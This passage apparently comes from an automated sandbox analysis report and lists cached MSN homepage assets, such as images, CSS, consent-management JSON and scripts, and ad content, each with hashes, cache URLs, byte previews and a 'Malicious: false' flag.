..\~..Y...p..$WAV.%.>.m7..[.5])..j..7j....dR..>.......O.V\|..Tn\|......[..(......U..<.9B.8..e/.G(\..{./2.,..Ni..)A.....4R.p.K.m-;...JZ...K.m....&.re.S....U.'bFUKb.i...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB1b9kTu[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	11573
Entropy (8bit):	7.941304187209279
Encrypted:	false
SSDEEP:	192:BYuGOf+w0HoAjhPj8k53ayAnis1H5W7Bfh5Su3tfmO5gI3Jwnv8MFmsW2nDqfEp2:eja+HhPgkkyw55alh5hx9WnvKsWGqfE0
MD5:	F67FAA2DE28E1B9AC00F0C7B3F5DFF9D
SHA1:	46C1D755764522376B6476D938CA71EB384498AC
SHA-256:	B3A383601CC1C45F8DE369A39DCA22E4CF1839B32ADAE0AA57E5D68D41FF4050
SHA-512:	EDC4DCC7509D2DCA704B02A384BE47CA475BE90EC999DE8583CF793484412B67395B77765D8B60D810DD2D01C90B5B9D2DE3A05E68395731D0C0B3385A46B63C
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b9kTu.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1963&y=1577
Preview:	......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......)h....)h.).B..F..IE03..x.L.Z..Z.g.A-..+.....z.l...$....{V.%..0..AM"..sG4.Q.j,....oj..R.?.j....T..JL....yjBZ...4...d.[.Y.jV>..}......q.....'......r..~.....)..E..a..L....m..8..H.v~.~un;....)</......7...TS.........qG).&..8....n9.#.Z..B....?.E$m...JG....'pU.R..@.j...f>.LD[M.M?&.&.c.).....e.Q.v(.bP.1N.....-....%29...cp.N.......m..w.......i...)qP-.$d._.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB1b9z28[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	16193
Entropy (8bit):	7.959423158750751
Encrypted:	false
SSDEEP:	384:e2/TidEYR4nR8rDGzM4VDQV3lzTP/e6+4aT3O6KDnYwO/P:eItYR4nCIQFtre6LY9z
MD5:	249DB6616D5AE7310591EDE2630F04F9
SHA1:	668337C4A40FCCADC4192374395B35D7E568931C
SHA-256:	A008CB5F10025C43B4C94F77D46AB3FACE59F5EBBA0CC83A9571624F26331FEC
SHA-512:	8AB23ED6FFE67A10DF38F75133C6543AAF717FE46844D2ACFC7CBF6495A2802F08CD0FBBE3800512AC5B1FD4F05B683D1E7769B96679BF2EC848990D570EDCBB
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b9z28.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....<5{<:...m...Ec.....gY.....WL.#..L.h.?`.nPs.^Ws4......I54:..I$.3n..d...Kd...cd6...X.ZX.....SI.v..q..R......^{..>X.\.1.&..q....i.'$.o'.W........4cs....-......]X.qnF.So.X.....T.n...6y.5)...O.hT...H..l....h7..?d.^......5{O........`..]..2.w...N\|<4..'...5.x.E.D).],.........i.M...ee....y..6.,.K.x9.=..cflc.3......m.h.?.C.m;...V....I.99...,.$.F.A*.O\|TC..:.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB1kc8s[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	799
Entropy (8bit):	7.616735751178749
Encrypted:	false
SSDEEP:	12:6v/7ee//6FAU+ZPhOPnAgOydY9vYyfS1Y+OyGo0VtgzKkcbqeGOrlkTR+a1eXGyI:QGp+Zpajd4/ObGPngzKkcOSnGLT
MD5:	2C55F358C8213245D8DE540D89B76ED0
SHA1:	413A0EA00DBB2A54C6A3933B8864E1847D795124
SHA-256:	D11901D46370D97173C94754B69E90D7540FAF1F5C571C5E521E3A062FBF0A77
SHA-512:	0385C2FE61CFFF69EE6A85D13003B4729B93132007294DF3407DAAB97318157C421940D689E01B6CE5360A57029393FEAB949A83647DF22D43DF5064E7B82DD0
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true&u=true&n=true&w=30&h=30
Preview:	.PNG........IHDR.............;0......sRGB.........gAMA......a.....pHYs..........o.d....IDATHK.kZQ....W.Vc.-m,...&`....`."....b...%...E2...&.R......A0......d."......>o-i....~...9...=?.!C.\{.j.bmmMR.V_.D......P(..j..Z-]..?...uV_...>.o.e.o..a.d21....\|>..mh4..J...........g..H.......;..C.R..."........J....Q.9..^.......8>??O.zo.Z.h4.N...r9...).......>R.9...Kz..W.T....J.w.3fee..a; ......+.X._]]....?q.\w.Ri.n.............p...CJ.N.Y....l:..).......d2.5..1.3d....\.s....6....nQ..Q...E..d.......l..B!2...G".H&..........ag5..ZR^..0.p.......4...\.2...6.....).........Xj.Ex.n.....&.Z.d.X..#V.b..lll..[...&''i........x....*8...w3..=.A...E..M.T..!8...Q(....L6)..r........h4..>......yj...j.9.:....f..+'._#......j..I...&.0.H4....<R...:....7.Y...n.......Z.s..2.....#A.j:s.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\NewErrorPageTemplate[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	1612
Entropy (8bit):	4.869554560514657
Encrypted:	false
SSDEEP:	24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
MD5:	DFEABDE84792228093A5A270352395B6
SHA1:	E41258C9576721025926326F76063C2305586F76
SHA-256:	77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512:	E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious:	false
IE Cache URL:	res://ieframe.dll/NewErrorPageTemplate.css
Preview:	.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\a5ea21[1].ico Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	758
Entropy (8bit):	7.432323547387593
Encrypted:	false
SSDEEP:	12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
MD5:	84CC977D0EB148166481B01D8418E375
SHA1:	00E2461BCD67D7BA511DB230415000AEFBD30D2D
SHA-256:	BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
SHA-512:	F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Preview:	.PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D..M..............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q\|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq\|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\auction[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	15926
Entropy (8bit):	5.778132209103576
Encrypted:	false
SSDEEP:	384:NJk3ZHSad4cOCH4byEGbA8OjbI3UxCN313yWN0NQ8:NJ1CdZU4ldVb8
MD5:	047E508E489D1B2C73BC481FF625DA79
SHA1:	BE414BD3B957A462B0DEBFBDAD2219EEA6C20FEA
SHA-256:	6543651158F6835F37970A9F0EFDC1126A4F2DCB51F52C2DBAD24B2FA57D641B
SHA-512:	321FA1A61A6816BC74B5D3A4EF8DB19A5E404CDAE6A1FC895159F82AA9E937EE6E45DEB5EBF6262964C2FAAC3136777AA2909CC6E1E5E614084030032B259431
Malicious:	false
IE Cache URL:	https://srtb.msn.com/auction?a=de-ch&b=01993e53dc8d4e9880fcbea0201e39f7&c=MSN&d=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&e=HP&f=0&g=homepage&h=&j=0&k=0&l=&m=0&n=infopane%7C3%2C11%2C15&o=&p=init&q=&r=&s=1&t=&u=0&v=0&_=1605805912051
Preview:	.<script id="sam-metadata" type="text/html" data-json="{"optout":{"msaOptOut":false,"browserOptOut":false},"taboola":{"sessionId":"v2_ca3eda1eb6b4c20461374b12cd4da5a6_7f7530e6-dbd8-4e0a-9235-575b2f57d46a-tuct6afae4d_1605773517_1605773517_CIi3jgYQr4c_GP6Omc3u58DiNiABKAEwKziy0A1AvogQSLSh3QNQ____________AVgAYABoopyqvanCqcmOAQ"},"tbsessionid":"v2_ca3eda1eb6b4c20461374b12cd4da5a6_7f7530e6-dbd8-4e0a-9235-575b2f57d46a-tuct6afae4d_1605773517_1605773517_CIi3jgYQr4c_GP6Omc3u58DiNiABKAEwKziy0A1AvogQSLSh3QNQ____________AVgAYABoopyqvanCqcmOAQ","pageViewId":"01993e53dc8d4e9880fcbea0201e39f7","RequestLevelBeaconUrls":[]}">.</script>.<li class="head-to-head serversidenativead hasimage " data-json="{"tvb":[],"trb":[],"tjb":[],"p":"outbrain","e":true}" data-provider="outbrain" data-ad-region="infopane" data-ad-index="3" data-viewability

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\de-ch[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	74702
Entropy (8bit):	5.345294167813595
Encrypted:	false
SSDEEP:	768:hVAyLXfhINb6yvz6Ix1wTpCUVkhB1Ct4AityQ1NEDEEvCDcRiZfWUcU5Jfoc:hVhEvxaEC+biAEv3RiEkz
MD5:	754F6C92A735B47A2CC5E7D03C2102D1
SHA1:	71DDB35ED5E57812B895A939C77A0196B538AF40
SHA-256:	491BF15460B5FEF7B972E48841BACADA7549A01CA52E46297E9F91B2E978132D
SHA-512:	D3A859DBB25BA28D0401428A6C68B87F0BE3825DAA773B161A86D33164846FF67ADD99FD4A1CF3CA4613293DD2F629C5CE2E9A3E6E8A7C796A361F02CEFA3C68
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/de-ch.json
Preview:	{"DomainData":{"cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir teilen diese Informationen mit unseren Partnern auf der Grundlage einer Einwilligung und berechtigter Interessen. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAllText":"Einstellungen speichern","CookiesUsedText":"Verwendete Cookies","AboutLink":"https://go.microsoft.com/fwlink/?LinkId=521839","H

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\e151e5[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	downloaded
Size (bytes):	43
Entropy (8bit):	3.122191481864228
Encrypted:	false
SSDEEP:	3:CUTxls/1h/:7lU/
MD5:	F8614595FBA50D96389708A4135776E4
SHA1:	D456164972B508172CEE9D1CC06D1EA35CA15C21
SHA-256:	7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
SHA-512:	299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Preview:	GIF89a.............!.......,...........D..;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\http___cdn.taboola.com_libtrc_static_thumbnails_9f4fea66ce7be70c7db3ef73376bf228[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	25563
Entropy (8bit):	7.978828915737703
Encrypted:	false
SSDEEP:	384:7krY6b98OUzkqLbGSeROp6JxopsvgBHLBMJQc1rCJCnT2iUMmt37o41RDBXrO:40ihUzkq/6csYnMOc14pt3F1RDZ6
MD5:	DCA8D6B9AC64EAC1806E70C0C6EC8836
SHA1:	2FCA0B6FE398833651F343C74A3025C7039D13AF
SHA-256:	DA9779FB1BBD1C1FDC942C4B193456C5AD0035A80A4CF46D295EC8C05254F55B
SHA-512:	9A2706FF3223BE858DB238C2ECEC79E0B378BF6D4D6EB48C182F7979CE7C64A782DC0C3BEB9069BD24A4A1C20DB039007B24C9A8FED810C555F2C66403FC4169
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F9f4fea66ce7be70c7db3ef73376bf228.png
Preview:	......JFIF.....................................................................&""&0-0>>T......................$.....$6"(""("60:/,/:0VD<<DVdTOTdylly............7...............5..................................................................Z.............H\|.......a.4.....",.. ...:....... ..\|...p.....}..8$.j.@@...>0a..\|...6....@!%..4.B:>...)..C..p:..\|....u....R.~.my.3............@...>...f.H.\|....R...Kp}.y.;vw...9.At....A.%..H.>... .#EE......6.........._.........(..`....C...\.......<.I....w....&.......k...T....,\|... iM.....f.e..\|7QR<.ID.....+.x>...'F.<..A"...... .wg\|;f.:C..y.;....{.%"...5..M]}~H...../JY;.9^.....A@......+..:...y.:........P..;.c..I.._.....N..2.)f...v.........".L{.,..E.{\|J....N.+..J....R.iT....fm.k.....I....D....\|..*u.}.......4....#.'....z.:.t....C...(w]).4............b....4...W..W...3.~2..p..C.j..}...y..`k.M.pz...3..j.C.7.....X.@.......F....2.Z.R..b.v.(.7..w......Lt..(^...w"\..9g...>.e<a........X.."].J.e.&...C.59e..Om\|.{.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\http___cdn.taboola.com_libtrc_static_thumbnails_GETTY_IMAGES_IBK_542734683__clsfZCtG[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	10756
Entropy (8bit):	7.874559132162376
Encrypted:	false
SSDEEP:	192:7GTO3wp9l4oI1TRI+K1M7FVm5jlzvos0FhWTD91+yiqFx3k3F7HZqTrf8j:KTOAp39I1T++G0Ql8smgDfpFG3x56fO
MD5:	530961F46738BB75E8A8C20EF3AC7B8B
SHA1:	55700ED468D4224871D9A0036CFEA0A82BFEAB2C
SHA-256:	6B99E6FDA79FFB376A6933803895517BFA1ECCCC159F7D9ABAC0D9E300CF06E4
SHA-512:	487F1A8AC644944E5AD87768743955FFAC05DE23A4F9F6C3C0D6BF28EBB601695407112C55386418DBFBE1C554828E981B32AA58AF7190D9DAE1363D0D3B015C
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F542734683__clsfZCtG.jpg
Preview:	......JFIF.............@ICC_PROFILE......0ADBE....mntrRGB XYZ ............acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 1999 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../.....................................%......%!(!.!(!;/))/;E:7:ESJJSici................................%......%!(!.!(!;/))/;E:7:ESJJSici.........7...."..........3...............................................................Q.N.(......J....Ic.A$.'_....h.a..5..Ug..J(:....(.}.=...i.)&.H{.DA$.".....l..o.k..}E)lt.,....8..+.X.l../iG,..)e.8{.DC$.".np0L..&...ib6..R..\M%...`.#-..d^.3.7r..IQ..H.......6..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\iab2Data[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	180232
Entropy (8bit):	5.115010741936028
Encrypted:	false
SSDEEP:	768:l3JqIWlR2TryukPPnLLuAlGpWAowa8A5NbNQ8nYHv:l3JqIcATDELLxGpEw7Aq8YP
MD5:	EC3D53697497B516D3A5764E2C2D2355
SHA1:	0CDA0F66188EBF363F945341A4F3AA2E6CFE78D3
SHA-256:	2ABD991DABD5977796DB6AE4D44BD600768062D69EE192A4AF2ACB038E13D843
SHA-512:	CC35834574EF3062CCE45792F9755F1FB4B63DDD399A5B44C40555D191411F0B8924E5C2FEFCD08BAC69E1E6D6275E121CABB4A84005288A7452922F94BE5658
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json
Preview:	{"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\otFlat[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	12588
Entropy (8bit):	5.376121346695897
Encrypted:	false
SSDEEP:	192:RtmLMzybpgtNs5YdGgDaRBYw6Q3gRUJ+q5iwJlLd+JmMqEb5mfPPenUpoQuQJ/Qq:RgI14jbK3e85csXf+oH6iAHyP1MJAk
MD5:	AF6480CC2AD894E536028F3FDB3633D7
SHA1:	EA42290413E2E9E0B2647284C4BC03742C9F9048
SHA-256:	CA4F7CE0B724E12425B84184E4F5B554F10F642EE7C4BE4D58468D8DED312183
SHA-512:	A970B401FE569BF10288E1BCDAA1AF163E827258ED0D7C60E25E2D095C6A5363ECAE37505316CF22716D02C180CB13995FA808000A5BD462252F872197F4CE9B
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/otFlat.json
Preview:	.. {.. "name": "otFlat",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtYmFubmVyLXNkayIgY2xhc3M9Im90RmxhdCI+PGRpdiBjbGFzcz0ib3Qtc2RrLWNvbnRhaW5lciI+PGRpdiBjbGFzcz0ib3Qtc2RrLXJvdyI+PGRpdiBpZD0ib25ldHJ1c3QtZ3JvdXAtY29udGFpbmVyIiBjbGFzcz0ib3Qtc2RrLWVpZ2h0IG90LXNkay1jb2x1bW5zIj48ZGl2IGNsYXNzPSJiYW5uZXJfbG9nbyI+PC9kaXY+PGRpdiBpZD0ib25ldHJ1c3QtcG9saWN5Ij48aDMgaWQ9Im9uZXRydXN0LXBvbGljeS10aXRsZSI+VGhpcyBzaXRlIHVzZXMgY29va2llczwvaDM+PCEtLSBNb2JpbGUgQ2xvc2UgQnV0dG9uIC0tPjxkaXYgaWQ9Im9uZXRydXN0LWNsb3NlLWJ0bi1jb250YWluZXItbW9iaWxlIiBjbGFzcz0ib3QtaGlkZS1sYXJnZSI+PGJ1dHRvbiBjbGFzcz0ib25ldHJ1c3QtY2xvc2UtYnRuLWhhbmRsZXIgb25ldHJ1c3QtY2xvc2UtYnRuLXVpIGJhbm5lci1jbG9zZS1idXR0b24gb3QtbW9iaWxlIG90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIEJhbm5lciIgdGFiaW5kZXg9IjAiPjwvYnV0dG9uPjwvZGl2PjwhLS0gTW9iaWxlIENsb3NlIEJ1dHRvbiBFTkQtLT48cCBpZD0ib25ldHJ1c3QtcG9saWN5LXRleHQiPldlIHVzZSBjb29raWVzIHRvIGltcHJvdmUgeW91ciBleHBlcmllbmNlLCB0byByZW1lbWJlciBsb2ctaW4gZGV0YWlscywgcHJvdmlkZSBzZWN1cmUgbG9

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\otTCF-ie[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	102879
Entropy (8bit):	5.311489377663803
Encrypted:	false
SSDEEP:	768:ONkWT0m7r8N1qpPVsjvB6z4Yj3RCjnugKtLEdT8xJORONTMC5GkkJ0XcJGk58:8kunecpuj5QRCjnrKxJg0TMC5ZW8
MD5:	52F29FAC6C1D2B0BAC8FE5D0AA2F7A15
SHA1:	D66C777DA4B6D1FEE86180B2B45A3954AE7E0AED
SHA-256:	E497A9E7A9620236A9A67F77D2CDA1CC9615F508A392ECCA53F63D2C8283DC0E
SHA-512:	DF33C49B063AEFD719B47F9335A4A7CE38FA391B2ADF5ACFD0C3FE891A5D0ADDF1C3295E6FF44EE08E729F96E0D526FFD773DC272E57C3B247696B79EE1168BA
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
Preview:	!function(){"use strict";var c="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function e(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function t(e,t){return e(t={exports:{}},t.exports),t.exports}function n(e){return e&&e.Math==Math&&e}function p(e){try{return!!e()}catch(e){return!0}}function E(e,t){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:t}}function o(e){return w.call(e).slice(8,-1)}function u(e){if(null==e)throw TypeError("Can't call method on "+e);return e}function l(e){return I(u(e))}function f(e){return"object"==typeof e?null!==e:"function"==typeof e}function i(e,t){if(!f(e))return e;var n,r;if(t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;if("function"==typeof(n=e.valueOf)&&!f(r=n.call(e)))return r;if(!t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;throw TypeError("Can't convert object to primitive value")}function y(e,t){retur

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\2bac2dfa2c6662619bff6d55b47d20ea92[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	18903
Entropy (8bit):	7.917266540836306
Encrypted:	false
SSDEEP:	384:rLcGI8/3jgBBvG8Z3BuI/6hifbkuX7tV8iIrn2AXASu0Yz3hHhVP:rBIuMXvBqRiDkuLbYbJu0aVP
MD5:	272794BD74EE5C0432A60FC349904624
SHA1:	AA9EBB012DBCDDB5EDF56FB0E88FFB7EA14EACC5
SHA-256:	D4A9775D831C722C3E2841D6F1790DA5A9BD3001F6FFE285C25F0C35C5DCAF1C
SHA-512:	245CB197D8F04BFF6586E7DDD91CD447E1EFDC209DB5995490FBB7EB254DF2D2D56877DC4EED7448EA541BF6AF937C1A8A7D01D5E9D6D6A3340AA1663265A493
Malicious:	false
IE Cache URL:	https://zem.outbrainimg.com/p/srv/sha/bd/60/86/2bac2dfa2c6662619bff6d55b47d20ea92.jpg?w=311&h=333&fit=crop&crop=center&fm=jpg
Preview:	......JFIF.....H.H.....@ICC_PROFILE......0ADBE....mntrRGB XYZ .........3.;acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 2000 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../..........................................................#...#%%525EE\..................................................#...#%%525EE\......M.7.."...................................................5h.w....]......b.V..B.b.......X.n.....y...v...6.V..U.JU-\....O...F..Yl.K.......zE..J.S)UT...\....'.X.b.....\|.W.65._\k.yJ..U..uKV......,.1f...w..M..6..q...Y..=..I.V.(V.x.. ...&-...7...6.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\39ab3103-8560-4a55-bfc4-401f897cf6f2[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
Category:	dropped
Size (bytes):	64434
Entropy (8bit):	7.97602698071344
Encrypted:	false
SSDEEP:	1536:uvrPk/qeS+g/vzqMMWi/shpcnsdHRpkZRF+wL7NK2cc8d55:uvrsSb7XzB0shpOWpkThLRyc8J
